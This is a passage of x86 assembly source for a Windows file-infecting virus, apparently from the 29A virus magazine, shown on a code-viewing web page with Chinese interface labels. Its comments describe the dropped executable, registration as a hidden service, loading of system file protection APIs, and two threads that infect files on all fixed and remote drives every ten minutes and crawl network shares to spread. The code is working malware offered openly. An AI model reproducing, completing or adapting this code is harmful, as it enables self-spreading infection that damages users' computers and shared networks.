📄 29a-7.003
字号:
db decsize dup (90h)
;-----------------------------------------------------------------------------
;WriteProcessMemory() is best to alter bytes because VirtualProtect() can fail
;-----------------------------------------------------------------------------
store_restore label near
mov esi, offset restore_loc
push esi
call dword ptr [ebx + 4 + size regcrcstk + expcrcstk.pGetCurrentProcess]
push eax
call dword ptr [ebx + 4 + size regcrcstk + expcrcstk.pWriteProcessMemory]
store_popsize label near
add esp, 'rgb!'
org $ - 4
dd popsize
push esi
pop esi
popad
jmp dword ptr [esp - 24h] ;no stack change in ring 3
;(except in some debuggers)
;-----------------------------------------------------------------------------
;virus code begins here in dropped exe
;-----------------------------------------------------------------------------
efishnc_exe label near
call walk_seh
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
execrcbegin label near ;place < 80h bytes from call for smaller code
dd (execrc_count + 1) dup (0)
execrcend label near
dd offset load_user32 - offset execrcend + 4
load_user32 label near
call skip_user32
db "user32", 0
skip_user32 label near
call dword ptr [esp + execrcstk.eLoadLibraryA + 4]
call init_findmz
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
usrcrcbegin label near ;place < 80h bytes from call for smaller code
dd (usrcrc_count + 1) dup (0)
usrcrcend label near
dd offset get_cmdline - offset usrcrcend + 4
;-----------------------------------------------------------------------------
;determine platform and dynamically select function types (ANSI or Unicode)
;-----------------------------------------------------------------------------
get_cmdline label near
mov ebx, esp
call dword ptr [ebx + size usrcrcstk + execrcstk.eGetVersion]
shr eax, 1fh
lea esi, dword ptr [eax * 4 + ebx]
;-----------------------------------------------------------------------------
;RegisterServiceProcess() if 9x/Me (just sets one bit)
;-----------------------------------------------------------------------------
mov ecx, dword ptr fs:[tib.TibTeb]
or byte ptr [ecx + teb.procflags + 1], al
;-----------------------------------------------------------------------------
;parse command-line in platform-independent way to see how file was run
;-----------------------------------------------------------------------------
dec ax
mov al, 0ffh
xchg edi, eax ;ffff if Unicode, 00ff if ANSI
call dword ptr [esi + size usrcrcstk + execrcstk.eGetCommandLineW]
stack_delta label near
mov ebp, dword ptr [eax]
and ebp, edi
cmp ebp, '"' ;Unicode-compatible compare
je skip_argv0
push ' '
pop ebp
skip_argv0 label near
push eax
call dword ptr [esi + usrcrcstk.uCharNextW]
mov ecx, dword ptr [eax]
and ecx, edi
je argv1_skip
cmp ecx, ebp
jne skip_argv0
find_argv1 label near
push eax
call dword ptr [esi + usrcrcstk.uCharNextW]
mov ecx, dword ptr [eax]
and ecx, edi
cmp ecx, ' ' ;Unicode-compatible compare
je find_argv1
argv1_skip label near
;-----------------------------------------------------------------------------
;if argv1 exists then argv0 was run using shell\open\command so run argv1
;-----------------------------------------------------------------------------
jecxz stack_copy
sub esp, size processinfo
mov edx, esp
sub esp, size startupinfo
mov ecx, esp
push edx
push ecx
xor edx, edx
push edx
push edx
push edx
push edx
push edx
push edx
push eax
push edx
push ecx
call dword ptr [esi + size usrcrcstk + execrcstk.eGetStartupInfoW]
call dword ptr [esi + size usrcrcstk + execrcstk.eCreateProcessW]
call dword ptr [ebx + size usrcrcstk + execrcstk.eExitProcess]
;-----------------------------------------------------------------------------
;allocate stack space for RNG cache
;-----------------------------------------------------------------------------
stack_copy label near
mov ebx, dword ptr [ebx + size usrcrcstk.execrcstk.eGetTickCount]
call ebx ;RNG seed
enter (statelen + 1) shl 2, 0 ;RNG cache
mov edi, esp
call randinit
mov edi, ebx
call find_mzhdr
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
krncrcbegin label near ;place < 80h bytes from call for smaller code
dd (krncrc_count + 1) dup (0)
krncrcend label near
dd offset swap_create - offset krncrcend + 4
;-----------------------------------------------------------------------------
;swap CreateFileW and CreateFileMappingA because of alphabet order
;-----------------------------------------------------------------------------
swap_create label near
mov dword ptr ds:[offset store_krnapi - offset efishnc_inf + expsize + 401003h], esp
mov ebx, esp
mov eax, dword ptr [ebx + krncrcstk.kCreateFileMappingA]
xchg dword ptr [ebx + krncrcstk.kCreateFileW], eax
mov dword ptr [ebx + krncrcstk.kCreateFileMappingA], eax
;-----------------------------------------------------------------------------
;get SFC support if available
;-----------------------------------------------------------------------------
call load_sfc
db "sfc_os", 0 ;Windows XP (forwarder chain from sfc.dll)
load_sfc label near
call cLoadLibraryA
test eax, eax
jne found_sfc
push 'cfs' ;Windows Me/2000
push esp
call cLoadLibraryA
pop ecx
test eax, eax
je sfcapi_esp
found_sfc label near
call init_findmz
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
sfccrcbegin label near ;place < 80h bytes from call for smaller code
dd (sfccrc_count + 1) dup (0)
sfccrcend label near
dd offset sfcapi_pop - offset sfccrcend + 4
sfcapi_pop label near
pop eax
sfcapi_esp label near
mov dword ptr ds:[offset store_sfcapi - offset efishnc_inf + expsize + 401001h], eax
;-----------------------------------------------------------------------------
;get rest of APIs required for network thread
;-----------------------------------------------------------------------------
push 'rpm'
push esp
call cLoadLibraryA
pop ecx
call init_findmz
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
netcrcbegin label near ;place < 80h bytes from call for smaller code
dd (netcrc_count + 1) dup (0)
netcrcend label near
dd offset netapi_esp - offset netcrcend + 4
netapi_esp label near
mov eax, dword ptr [esp + netcrcstk.nWNetCloseEnum - netcrcstk.nWNetOpenEnumW]
mov dword ptr ds:[offset store_netapi - offset efishnc_inf + expsize + 401001h], eax
;-----------------------------------------------------------------------------
;initialise service table if NT/2000/XP
;-----------------------------------------------------------------------------
call cGetVersion
shr eax, 1fh
jne svc_main ;no service if 9x/Me
push eax
push eax
push offset regdll - offset efishnc_inf + expsize + 401000h
call cLoadLibraryA
call init_findmz
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
svccrcbegin label near ;place < 80h bytes from call for smaller code
dd (svccrc_count + 1) dup (0)
svccrcend label near
dd offset start_disp - offset svccrcend + 4
start_disp label near
pop eax
mov ecx, esp
add edi, offset svc_main - offset start_disp
push edi
push ecx
push esp
call eax ;does not return if service launch
add esp, size SERVICE_TABLE_ENTRY ;fix stack if app launch
svc_main label near
push eax
push esp
xor esi, esi
push esi
push esi
call create_thr1
;-----------------------------------------------------------------------------
;thread 1: infect files on all fixed and remote drive letters
;-----------------------------------------------------------------------------
find_drives proc near
mov eax, '\:A' ;NEC-PC98 uses A: for boot drive which can be hard disk
drive_loop label near
push eax
push esp
push (krncrcstk.kGetDriveTypeA - krncrcstk.klstrlenW) shr 2
pop eax
call store_krnapi
sub al, DRIVE_FIXED
je drive_set
xchg ecx, eax
loop drive_next ;loop if not DRIVE_REMOTE
drive_set label near
push esp
call cSetCurrentDirectoryA
call find_files
drive_next label near
pop eax
inc eax
cmp al, 'Z' + 1
jne drive_loop
push 10 * 60 * 1000 ;10 minutes
call cSleep
jmp find_drives
find_drives endp
create_thr1 label near
push esi
push esi
call cCreateThread
push esp
push esi
push esi
call create_thr2
;-----------------------------------------------------------------------------
;thread 2: find files on network shares using non-recursive algorithm
;-----------------------------------------------------------------------------
call get_krnapis
find_wnet proc near
xor ebx, ebx ;previous handle
xor esi, esi ;previous node
xor edi, edi ;previous buffer
wnet_open label near
push eax
push esp
push edi
push 0
push RESOURCETYPE_DISK
push RESOURCE_GLOBALNET
call dword ptr [ebp + netcrcstk.nWNetOpenEnumW - size netcrcstk]
push eax
push edi
call cGlobalFree
pop ecx
pop edi
inc ecx
loop wnet_next
push size wnetlist
push ecx ;GMEM_FIXED
call cGlobalAlloc
mov dword ptr [eax + wnetlist.wnetprev], esi
mov dword ptr [eax + wnetlist.wnethand], ebx
xchg esi, eax
mov ebx, edi
wnet_next label near
push 1
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -